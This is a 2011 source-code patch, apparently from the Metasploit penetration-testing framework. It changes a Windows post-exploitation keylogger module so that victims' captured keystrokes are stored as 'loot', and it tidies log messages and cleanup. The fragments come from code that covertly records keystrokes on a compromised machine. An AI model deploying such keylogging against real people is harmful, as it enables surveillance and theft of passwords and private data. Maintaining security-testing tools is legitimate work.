From 9bc2a2cd3a86eae83564ee755d224f4d27e6bc41 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 26 Feb 2011 04:54:45 +0000 Subject: [PATCH] Store keystrokes as loot git-svn-id: file:///home/svn/framework3/trunk@11835 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/auxiliary/report.rb | 2 +- .../post/windows/capture/keylog_recorder.rb | 31 +++++++------------ 2 files changed, 13 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb index e5fad80e86..7e8161d8a2 100644 --- a/lib/msf/core/auxiliary/report.rb +++ b/lib/msf/core/auxiliary/report.rb @@ -175,7 +175,7 @@ module Auxiliary::Report path = File.join(Msf::Config.loot_directory, name) full_path = ::File.expand_path(path) - print_status("Writing #{ltype} (#{ctype}) for #{host}: (#{filename} - #{info})") + print_good("Writing #{ltype} (#{ctype}) for #{host}: (#{filename} - #{info})") File.open(full_path, "wb") do |fd| fd.write(data) end diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index cf75dfcef2..91ba406c2d 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -75,31 +75,24 @@ class Metasploit3 < Msf::Post end end + if startkeylogger keycap(datastore['INTERVAL'],set_log) end end - # Method for creation of log file + # Returns the path name to the stored loot filename def set_log - logs = ::File.join(Msf::Config.log_directory,'post','keylog_recorder') - filenameinfo = sysinfo['Computer'] + "_" + ::Time.now.strftime("%Y%m%d.%M%S") - # Create the log directory - ::FileUtils.mkdir_p(logs) - - #logfile name - logfile = logs + ::File::Separator + filenameinfo + ".txt" - - return logfile + store_loot("host.windows.keystrokes", "text/plain", session, "", "keystrokes.txt", "User Keystrokes") end def lock_screen - print_status("Locking Screen...") + print_status("Locking the desktop...") lock_info = session.railgun.user32.LockWorkStation() if lock_info["GetLastError"] == 0 print_status("Screen has been locked") else - print_error("Screen lock Failed") + print_error("Screen lock failed") end end @@ -185,7 +178,7 @@ class Metasploit3 < Msf::Post sleep(2) if not outp.empty? - print_good("keystrokes captured #{outp}") if datastore['ShowKeystrokes'] + print_good("Keystrokes captured #{outp}") if datastore['ShowKeystrokes'] file_local_write(logfile,"#{outp}\n") end end @@ -197,22 +190,22 @@ class Metasploit3 < Msf::Post #Creating DB for captured keystrokes print_status("Keystrokes being saved in to #{logfile}") #Inserting keystrokes every number of seconds specified - print_status("Recording ") + print_status("Recording keystrokes...") while rec == 1 - #getting and writing Keystrokes write_keylog_data(logfile) - sleep(keytime.to_i) end rescue::Exception => e - print_status "Saving last few keystrokes" + print_status "Saving last few keystrokes..." write_keylog_data(logfile) - - print("\n") print_status("#{e.class} #{e}") print_status("Stopping keystroke sniffer...") session.ui.keyscan_stop end end + def cleanup + session.ui.keyscan_stop rescue nil + end + end